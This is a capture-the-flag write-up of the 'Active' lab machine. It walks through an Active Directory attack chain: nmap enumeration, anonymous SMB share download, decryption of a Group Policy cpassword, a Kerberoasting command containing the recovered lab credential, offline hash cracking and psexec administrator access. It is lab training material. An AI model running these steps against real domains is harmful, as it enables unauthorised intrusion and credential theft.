# Active (Easy)

## Enumeration

### Nmap

```
nmap -sC -sV -oA nmap/10.10.10.100 10.10.10.100
```

```
Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-07T15:01:24
|_  start_date: 2021-07-07T05:25:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 11:01:33 2021 -- 1 IP address (1 host up) scanned in 89.52 seconds
```

We first can go to SMB enumeration.

### SMB

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5hStvCvETj5tLJEJC%2Fimage.png?alt=media\&token=310684c7-1329-4e12-9c3c-5a559148dd6f)

As we can see, we can anonymous login to the machine's SMB

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg68xvpunfYK75ACWti%2Fimage.png?alt=media\&token=382cc49b-c2a9-4423-8390-f6131dea3e88)

For the Users directory, it seems like we can't access.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5hezVSwsqjctLDFDO%2Fimage.png?alt=media\&token=9910500a-2313-49da-9b51-e7a8e99f0fe8)

We can see there is a directory called **active.htb** and inside the directory has multiple of files.

We can use a command called smbget to download all the files inside.

```
smbget -R smb://10.10.10.100/Replication
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg5iInnCKSwLvrnZ1Zl%2Fimage.png?alt=media\&token=a06f3cae-27f5-458d-8fb0-a346283bcfc1)

Inside the directory, there is a file called Groups.xml

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg67cMfk9duzwjunFcz%2Fimage.png?alt=media\&token=eece6d05-d858-46d4-b03e-b82bee565f34)

We can see that user name is active.htb\SVC\_TGS *and* c\_password.

After googling, we can decrypt c\_password using this [github repository](https://github.com/t0thkr1s/gpp-decrypt)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg5gJWIZmTJg5IMo6e2%2F-Mg68YKReBt7WENh_Rfv%2Fimage.png?alt=media\&token=7ef93aab-8e55-4a18-a3c1-04762e16550d)

We then can use the username and password to log in to the Users shared folder of the SMB

## User

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg69L4AFkXC42qigTrq%2Fimage.png?alt=media\&token=0ae3b558-97fe-4f30-8bb1-e20114862dba)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6QKdNmCNMVJNGHQBT%2Fimage.png?alt=media\&token=f2c888c1-c842-46a6-a4cb-e4fcf5688ebe)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6QUq65-ZKIS5qTUvZ%2Fimage.png?alt=media\&token=1170df1e-0e5d-4bd7-8dee-4bcb32d78276)

## Privilege Escalation

### Get-UserSPN

We can use getUserSPN to get administrator SPN ticket

```
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6TvMiI-jSb2N2SywJ%2Fimage.png?alt=media\&token=e877e45c-fce4-44a9-a176-6c8871cdea23)

We then can save this ticket to a file and let John-The-Ripper to crack the hash

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6UIP5gVu_ev1Y3uVF%2Fimage.png?alt=media\&token=62d28784-c9eb-4ef9-ae39-5ffde5dd628f)

We then get a password.

We then can use psexec to get administrator login

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6VeaPgAf8UU17vMd_%2Fimage.png?alt=media\&token=8cca272b-3728-47cf-a84a-9dcf357560bc)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mg694gPzbkIriJ-_uYj%2F-Mg6VyRGCk0v1LU2P39n%2Fimage.png?alt=media\&token=6d4a2646-5f5e-4b9a-af6c-e8a7113bd1b9)

Got ROOT!